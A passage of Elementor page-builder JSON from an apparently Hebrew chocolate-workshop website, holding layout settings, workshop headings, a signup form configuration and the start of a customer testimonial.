center\",\"background_size\":\"cover\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"25\",\"bottom\":\"40\",\"left\":\"25\",\"isLinked\":false}},\"elements\":[{\"id\":\"3b866986\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.73)\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"63\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"53\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c8a61fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":33,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\"},\"space\":{\"unit\":\"%\",\"size\":18},\"_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"_background_background\":\"classic\",\"_background_color\":\"#f1d5ad\",\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1f909fe7\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d0\\u05d9\\u05db\\u05d5\\u05ea\\u05d9 \\u05d1\\u05d9\\u05d5\\u05dd \\u05d0\\u05d7\\u05d3 \\u05d8\\u05e2\\u05d9\\u05dd \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"45\"},\"typography_font_weight\":\"100\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"0.9\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"38\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"35\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"35481412\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"22\"},\"typography_font_weight\":\"bold\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"20\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"18\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41e0dd23\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"_id\":\"eovd5tr\",\"required\":\"true\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"eovd5tr\"},{\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"_id\":\"68frv7y\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"68frv7y\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"width\":\"100\",\"_id\":\"p0rl9g7\",\"required\":\"\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"p0rl9g7\"}],\"show_labels\":\"\",\"button_text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"success_message\":\"The message was sent successfully!\",\"error_message\":\"There\'s something wrong... Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong... The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":\"10\"},\"row_gap\":{\"unit\":\"px\",\"size\":\"15\"},\"field_text_color\":\"#54595f\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_typography_typography\":\"custom\",\"button_typography_font_weight\":\"bold\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_background_color\":\"#5c0011\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"field_typography_typography\":\"custom\",\"field_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"13\"},\"button_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"22\",\"bottom\":\"22\",\"left\":\"22\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"button_background_hover_color\":\"#40272c\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"label_typography_typography\":\"custom\",\"label_typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4f74ca63\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#e3e0dd\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"20\",\"bottom\":\"70\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"655473aa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"55.702\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"12\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"13679594\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e2\\u05dd \\u05d7\\u05d1\\u05e8\\u05d9\\u05dd\",\"align\":\"right\",\"title_color\":\"#40272c\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"35\"},\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_weight\":\"100\",\"typography_text_transform\":\"capitalize\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"31\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"30\"},\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"66f30f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05db\\u05d5\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05e9\\u05d0\\u05d7\\u05e8\\u05d9, \\u05d7\\u05dc\\u05e7\\u05e0\\u05d5 \\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd \\u05e4\\u05d7\\u05d5\\u05ea \\u05d1\\u05d0\\u05e8\\u05d5\\u05d7\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05e8\\u05e7 \\u05db\\u05d3\\u05d9 \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05ea\\u05e4\\u05e8\\u05d9\\u05d8 \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e2\\u05d3 \\u05ea\\u05d5\\u05de\\u05d5, \\u05d0\\u05d6 \\u05dc\\u05de\\u05d4 \\u05e9\\u05dc\\u05d0 \\u05e0\\u05e2\\u05e9\\u05d4 \\u05d9\\u05d5\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd?<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05e6\\u05e8\\u05d5 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05dc\\u05e8\\u05d2\\u05e2\\u05d9\\u05dd \\u05d4\\u05d0\\u05dc\\u05d4, \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05d4\\u05d2\\u05d9\\u05e2 \\\"\\u05db\\u05de\\u05e2\\u05d8 \\u05e9\\u05d1\\u05e2\\u05d9\\u05dd\\\" \\u05d5\\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05de\\u05d2\\u05d5\\u05d5\\u05df \\u05de\\u05d0\\u05db\\u05dc\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd \\u05e9\\u05e1\\u05d5\\u05d1\\u05d1\\u05d9\\u05dd \\u05e1\\u05d1\\u05d9\\u05d1 \\u05d4\\u05d0\\u05d5\\u05db\\u05dc \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1 \\u05e2\\u05dc \\u05db\\u05d5\\u05dc\\u05e0\\u05d5, \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d4\\u05d7\\u05dc \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e8\\u05d9\\u05e8 \\u05d5\\u05e2\\u05d3 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05d6\\u05dc, \\u05d4\\u05db\\u05dc \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9 \\u05dc\\u05de\\u05d3\\u05d9 \\u05d1\\u05db\\u05dc \\u05e6\\u05d5\\u05e8\\u05d4 \\u05d5\\u05e6\\u05d1\\u05e2, \\u05db\\u05dc \\u05d3\\u05e8\\u05da \\u05d5\\u05e9\\u05e2\\u05d4.\\u00a0<\\/p>\",\"text_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19},\"typography_font_family\":\"Open Sans Hebrew\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1.6\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"17\"},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"15f91cbb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"44.298\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_position\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"385ae28\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/inner-hp.jpg\",\"id\":26}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4477cb\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"25\",\"bottom\":\"50\",\"left\":\"25\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"20\",\"bottom\":\"60\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"702ee38f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"60600fc4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"f9b0ce7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"6945b5b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":31,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-woman.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"fa7a00f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"afa7d0f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":28,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-company.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4a4b992\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"c498248\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":30,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-kids.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5684ff50\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"id\":91,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/BG.jpg\"},\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#190606\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.75},\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"115\",\"bottom\":\"50\",\"left\":\"115\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"74663cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"125f3fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05de\\u05d4 \\u05d4\\u05e9\\u05d1\\u05e2\\u05d9\\u05dd \\u05d4\\u05de\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e9\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05de\\u05e8\\u05d9\\u05dd\",\"align\":\"center\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":53},\"typography_font_weight\":\"400\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"43\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"40\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6410b809\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"caption\":\"\\u05e0\\u05ea\\u05d9 \\u05d5\\u05d2\\u05d1\\u05e8\\u05d9\\u05d0\\u05dc\\u05d4 \\u05de\\u05e8\\u05d0\\u05e9\\u05d5\\u05df \\u05dc\\u05e6\\u05d9\\u05d5\\u05df\",\"text_color\":\"#cccccc\",\"caption_typography_typography\":\"custom\",\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":13},\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6c4e5757\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\\"\\u05ea\\u05de\\u05d9\\u05d3 \\u05d0\\u05d4\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d0\\u05e3 \\u05e4\\u05e2\\u05dd \\u05dc\\u05d0 \\u05d7\\u05e9\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d0\\u05e0\\u05d9 \\u05d0\\u05ea\\u05e8\\u05d2\\u05e9 \\u05db\\u05dc \\u05db\\u05da \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05dc\\u05dd \\u05e9\\u05dc \\u05de\\u05ea\\u05d5\\u05e7. \\u05ea\\u05d5\\u05d3\\u05d4 \\u05e8\\u05d1\\u05d4 \\u05dc\\u05e6\\u05d5\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3 \\u05e9\\u05e2\\u05d6\\u05e8 \\u05dc\\u05d9 \\u05dc\\u05de\\u05e6\\u05d5\\u05d0 \\u05d0\\u05ea \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 